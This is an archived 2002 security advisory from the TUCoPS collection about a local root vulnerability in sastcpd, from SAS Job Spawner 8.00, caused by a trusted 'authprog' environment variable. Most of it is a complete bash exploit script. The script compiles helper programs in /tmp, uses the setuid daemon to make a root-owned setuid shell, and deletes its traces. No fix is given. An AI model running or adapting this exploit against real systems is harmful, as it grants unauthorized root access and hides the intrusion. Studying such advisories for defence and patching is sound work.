TUCoPS :: Unix :: Various Flavours :: misc5051.htm

sas - sastcpd trusts variables, this leads in local root exploit
31th Jan 2002 [SBWID-5051]
COMMAND

	sastcpd trusts variables, this leads in local root exploit

SYSTEMS AFFECTED

	SAS Job Spawner for Open Systems version 8.00

PROBLEM

	

	The daemon passes a user-defined environment variable, \'authprog\',  to
	execve(). This obviously is a problem if sastcpd is setuid.
	

	Exploit =======
	

	#!/bin/bash

	# sastcpd 8.0 \'authprog\' vulnerability.

	# rpc <rpc@unholy.net> || <h@ckz.org>

	# Thanks sharefuzz!

	

	cat <<EOT >/tmp/hesh.c

	int

	main(void)

	{

		setuid(0);

		setgid(0);

		execl(\"/bin/ksh\", \"ksh\", (char *)0);

	}

	EOT

	

	cat <<EOT >/tmp/heh.c

	int

	main(void)

	{

		setuid(0);

		setgid(0);

		system(\"chown 0:0 /tmp/hesh\");

		system(\"chmod 4755 /tmp/hesh\");

		return 0;

	}

	EOT

	

	gcc -o /tmp/heh /tmp/heh.c

	gcc -o /tmp/hesh /tmp/hesh.c

	

	export authprog=/tmp/heh

	/path/to/sas/utilities/bin/sastcpd

	

	sleep 1

	rm /tmp/he*.c

	rm /tmp/heh

	/tmp/hesh

	

SOLUTION

	None yet

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH